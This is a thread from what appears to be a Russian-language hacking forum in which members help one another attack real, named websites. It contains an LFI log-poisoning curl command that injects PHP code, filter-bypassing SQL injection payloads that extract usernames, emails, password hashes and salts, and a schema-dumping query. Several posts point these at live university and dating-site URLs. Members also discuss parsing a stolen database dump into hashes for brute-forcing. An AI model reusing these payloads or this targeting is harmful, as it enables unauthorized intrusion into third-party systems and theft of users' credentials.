Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Zahar

    Zahar Banned

    Joined:
    17 Mar 2008
    Messages:
    0
    Likes Received:
    1
    Reputations:
    0
    LFI

    Камрады помогите советом.
    Есть LFI, нащупал только лги ошибок, отсылаю запрос с кодом курлом:
    HTML:
    curl http://www.domain.org/nopages1.php --referer "http://go<?phpinfo();?>"
    В логе режет конструкцию
    PHP:
    <?
    и все что после нее.
    Есть ли метод обхода такого фильтра?
     
  2. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    Faaax, нужен запрос без плюсов, /**/ и остальных знаков, обойтись только скобками
     
    _________________________
  3. gl0w

    gl0w Member

    Joined:
    31 Dec 2011
    Messages:
    59
    Likes Received:
    21
    Reputations:
    5
    Что за бред ты написал... У него остается закрывающая скобка в конце запроса, что и вызывает ошибку. Остается она потому что он поставил закрывающую после тройки, чем самым нарушил логику.
     
  4. Ereee

    Ereee Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    560
    Likes Received:
    370
    Reputations:
    267
    DronS,
    ты забыл комментарий после запроса:
     
  5. gl0w

    gl0w Member

    Joined:
    31 Dec 2011
    Messages:
    59
    Likes Received:
    21
    Reputations:
    5
    Ну можно и комментарий)
     
  6. mix0x0

    mix0x0 Active Member

    Joined:
    1 Nov 2010
    Messages:
    363
    Likes Received:
    189
    Reputations:
    92
    Есть дамп БД, необходимо некоторые данные привести в другой вид.

    Первоначально:
    Необходимо вырвать данные из определённых колонок, а именно: username:password:salt

    Подскажите, чем лучше это сделать?
    P.S. Вручную не предлагать.
     
  7. Faaax

    Faaax Banned

    Joined:
    30 Aug 2010
    Messages:
    329
    Likes Received:
    46
    Reputations:
    11
    union(select(1),2,3,table_name,5,(6)from(informati on_schema.tables)limit+1,1)
    так тут у тебя ни одного пробела нету
    gl0w,это не бред
    если ставишь скобку перед селектом,то нужно еёё и закрывать ты чё?!?!:)
     
  8. DronS

    DronS New Member

    Joined:
    14 Jul 2011
    Messages:
    10
    Likes Received:
    0
    Reputations:
    0
    Все правильно он подсказал. Ты ответ БД читал до конца?)
    Code:
    WHERE socialgroup.groupid IN (3) UNION SELECT concat(username,0x3a,email,0x3a,password,0x3a,salt  ) FROM user WHERE userid=1);
    2gl0w спасибо, запрос корректен теперь
    2Ereee с коментарием тоже нормуль идет
     
    #19748 DronS, 13 Mar 2012
    Last edited: 13 Mar 2012
  9. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    Faaax =\
    union(select(1),2,3,table_name,5,(6)from(informati on_schema.tables)limit+1,1)
    так видно?
     
    _________________________
  10. Ereee

    Ereee Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    560
    Likes Received:
    370
    Reputations:
    267
    mix0x0,
    у тебя есть шелл на сайте? Можно отдельно колонки сдампить. Есть спец. версия by Boolean. На рдоте поищи.
     
  11. stan0009

    stan0009 Member

    Joined:
    30 Jul 2010
    Messages:
    118
    Likes Received:
    5
    Reputations:
    0
    в какой таблице находится логин и пароль от форума SMF?
    а то найти не могу(

    все, было найдено. Просто в 200 таблицах потерялся)
    кто не знает - это smf_members
     
    #19751 stan0009, 13 Mar 2012
    Last edited: 13 Mar 2012
  12. mix0x0

    mix0x0 Active Member

    Joined:
    1 Nov 2010
    Messages:
    363
    Likes Received:
    189
    Reputations:
    92
    Спасибо за наводку, будем гуглить.

    Ereee, шелла нету, только дамп бд.
    Нужно спарсить логины, хэши (+salt) для брута, в дальнейшем использовать как словарь.
     
  13. Ereee

    Ereee Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    560
    Likes Received:
    370
    Reputations:
    267
    В четвертыx новый адрес сайта http://dbitems.ru
     
  14. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,551
    Likes Received:
    173
    Reputations:
    75
    Помогите скулю разкрутитть плыз
    тут
    http://zapoved.ru/?act=docs_more&id=3
    тут
    http://nir.msu.mogilev.by/?mod=resource&id=31
    и тут
    http://www.mgpu.ru/download.php?id=11048
     
  15. Cybersteger

    Cybersteger Member

    Joined:
    9 Oct 2009
    Messages:
    40
    Likes Received:
    13
    Reputations:
    15

    исходя из данных каторих ты дал, можно перебирать с помощью WHERE если есть по чему перебирать типа колонка (id) или попробовать вариант с акумуляцею данных в переменную

    Code:
    union(select(1),2,3,(select(@x)from(select(@x:=0x00),(select(null)from(information_schema.columns)where(table_schema!=0x696e666f726d6174696f6e5f736368656d61)and(0x00)in(@x:=concat(@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name))))x),5,(6))
    https://rdot.org/forum/showthread.php?t=1170 -- для изучения
     
    1 person likes this.
  16. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,551
    Likes Received:
    173
    Reputations:
    75
    а чего не получается ничего вывести?

    http://zapoved.ru/?act=docs_more&id=3%27%29+limit+0,0+union+select+1,table_name,3,4,5,6,7+from+information_schema.tables+limit+0,1+and+%28%27DzDB%27=%27DzDB
     
  17. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    вопрос мой исчерпан, спасибо Cybersteger, так же к прочтению всплыло https://rdot.org/forum/showthread.php?t=1243
     
    _________________________
  18. HeaVeNSeR

    HeaVeNSeR Member

    Joined:
    3 Dec 2008
    Messages:
    176
    Likes Received:
    11
    Reputations:
    1
    Ребят,помогите продвинуться в раскрутке скули :rolleyes:

    http://www.single-russian-woman.com...0&show=0&sorting=-1bvn5&weight1=1&weight2=210

    уязвимость в параметре sorting,вроде...ошибка в HTTP-заголовке

    Code:
    http://www.single-russian-woman.com/cgi-bin/search.cgi?age1=19&age2=100&country=&height1=100&height2=250&photocheck=0&seeking=0&show=0&sorting=-1bvn5&weight1=1&weight2=210
    
    GET /cgi-bin/search.cgi?age1=19&age2=100&country=&height1=100&height2=250&photocheck=0&seeking=0&show=0&sorting=-1bvn5&weight1=1&weight2=210 HTTP/1.1
    Host: www.single-russian-woman.com
    User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:10.0.2) Gecko/20100101 Firefox/10.0.2
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: ru-ru,ru;q=0.8,en-us;q=0.5,en;q=0.3
    Accept-Encoding: gzip, deflate
    Connection: keep-alive
    Cookie: adv=http%3A%2F%2Fwww.google.com%2Furl%3Fsa%3Dt%26rct%3Dj%26q%3Dsingle%2520russian%2520women%26source%3Dweb%26cd%3D1%26ved%3D0CHUQFjAA%26url%3Dhttp%253A%252F%252Fwww.single-russian-woman.com%252F%26ei%3DZlFeT4PlJc_V4QSqkL3iDw%26usg%3DAFQjCNEj3xkfJiBZvycDvWk08byKTKFdZg; seeking=0; country=; age1=19; age2=100; height1=100; height2=250; weight1=1; weight2=210; sorting=15; lang=; langlevel=; eyecolor=; haircolor=; activerest=; genrefilms=; favmusic=; zodiac=; smoking=; drinking=; children=; keyword=; name=; maritalstatus=; russian=; photost=0; session=n2aojhfg57vb0xpim5kpgc1147925
    Cache-Control: max-age=0
    
    HTTP/1.1 200 OK
    Date: Tue, 13 Mar 2012 19:20:30 GMT
    Server: Apache/2.2.3 (CentOS)
    [B][COLOR=Red]DBD: :mysql::st execute failed: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'DESC LIMIT 0, 12' at line 1 at search.cgi line 1285., :mysql::st fetchrow failed: fetch() without execute() at search.cgi line 1286.[/COLOR][/B]
    Set-Cookie: seeking=0; path=/
    Set-Cookie: country=; path=/
    Set-Cookie: age1=19; path=/
    Set-Cookie: age2=100; path=/
    Set-Cookie: height1=100; path=/
    Set-Cookie: height2=250; path=/
    Set-Cookie: weight1=1; path=/
    Set-Cookie: weight2=210; path=/
    Set-Cookie: sorting=15; path=/
    Set-Cookie: lang=; path=/
    Set-Cookie: langlevel=; path=/
    Set-Cookie: eyecolor=; path=/
    Set-Cookie: haircolor=; path=/
    Set-Cookie: activerest=; path=/
    Set-Cookie: genrefilms=; path=/
    Set-Cookie: favmusic=; path=/
    Set-Cookie: zodiac=; path=/
    Set-Cookie: smoking=; path=/
    Set-Cookie: drinking=; path=/
    Set-Cookie: children=; path=/
    Set-Cookie: keyword=; path=/
    Set-Cookie: name=; path=/
    Set-Cookie: maritalstatus=; path=/
    Connection: close
    Transfer-Encoding: chunked
    Content-Type: text/html
    ----------------------------------------------------------
    
    также на соседском сайте джумла стоит...на нем из паблик exploitov один ток подошёл вроде..( http://seclists.org/bugtraq/2011/Apr/80 )
    тоже вроде скуля,но продвинуться мне там не получилось...
    http://www.stopsmoking4steps.com/index.php?option=com_jce&Itemid=-1


    подсобите,пожалуйста,в какую сторону копать :rolleyes:
     
  19. Fooog

    Fooog Elder - Старейшина

    Joined:
    19 Sep 2008
    Messages:
    307
    Likes Received:
    170
    Reputations:
    12
    Где можно почитать о баге типа: news/1'
    ?
    Выдает по типу:
    You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1'' and pd.news_id ='4'' at line 1
     
  20. OxoTnik

    OxoTnik На мышей

    Joined:
    10 Jun 2011
    Messages:
    943
    Likes Received:
    525
    Reputations:
    173
    Это обычная sql уязвимость читай http://forum.antichat.ru/thread43966.html
     
Thread Status:
Not open for further replies.